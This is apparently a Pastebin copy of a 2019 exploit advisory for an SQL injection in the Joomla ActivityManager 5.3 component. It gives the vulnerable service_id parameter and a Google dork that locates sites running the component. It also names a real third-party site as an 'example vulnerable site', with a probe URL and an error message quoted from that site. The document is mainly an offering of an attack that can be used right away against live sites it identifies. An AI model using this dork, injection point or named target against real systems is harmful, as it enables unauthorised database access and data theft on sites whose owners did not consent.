Advertisement
KingSkrupellos

Joomla ActivityManager Components 5.3 SQL Injection

Feb 3rd, 2019
226
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.99 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla ActivityManager Components 5.3 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/02/2019
  7. # Vendor Homepage : codecanyon.net
  8. # Software Information Link : codecanyon.net/item/activity-board-activity-manager/634766
  9. # Software Version : 5.3
  10. # Software Price : 16$
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_activitymanager''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. Activity Board is a simple system that helps groups or teams track activities
  26.  
  27. that are relevant to the whole organization. It can be used by consultants or
  28.  
  29. user support teams to checklist activities for the day and also
  30.  
  31. indicates the lead/responsible persons.
  32.  
  33. ####################################################################
  34.  
  35. # Impact :
  36. ***********
  37. Joomla ActivityManager 5.3 component for Joomla is prone to an SQL-injection
  38.  
  39. vulnerability because it fails to sufficiently sanitize user-supplied
  40.  
  41. data before using it in an SQL query.
  42.  
  43. Exploiting this issue could allow an attacker to compromise the application,
  44.  
  45. access or modify data, or exploit latent vulnerabilities in the underlying database.
  46.  
  47. A remote attacker can send a specially crafted request to the vulnerable application
  48.  
  49. and execute arbitrary SQL commands in application`s database.
  50.  
  51. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  52.  
  53. An attacker can exploit this issue using a browser.
  54.  
  55. ####################################################################
  56.  
  57. # SQL Injection Exploit :
  58. **********************
  59.  
  60. /index.php?option=com_activitymanager&view=displayservices&layout=servicedetail&service_id=[SQL Injection]
  61.  
  62. ####################################################################
  63.  
  64. # Example Vulnerable Sites :
  65. *************************
  66.  
  67. [+] chicom.it/demo/index.php?option=com_activitymanager&view=displayservices&layout=servicedetail&service_id=1%27
  68.  
  69. ####################################################################
  70.  
  71. # Example SQL Database Error :
  72. ****************************
  73.  
  74. Strict Standards: Non-static method JLoader::import()
  75. should not be called statically in /web/htdocs
  76. /www.chicom.it/home/demo/libraries/joomla/import.php on line 29
  77.  
  78. ####################################################################
  79.  
  80. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  81.  
  82. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement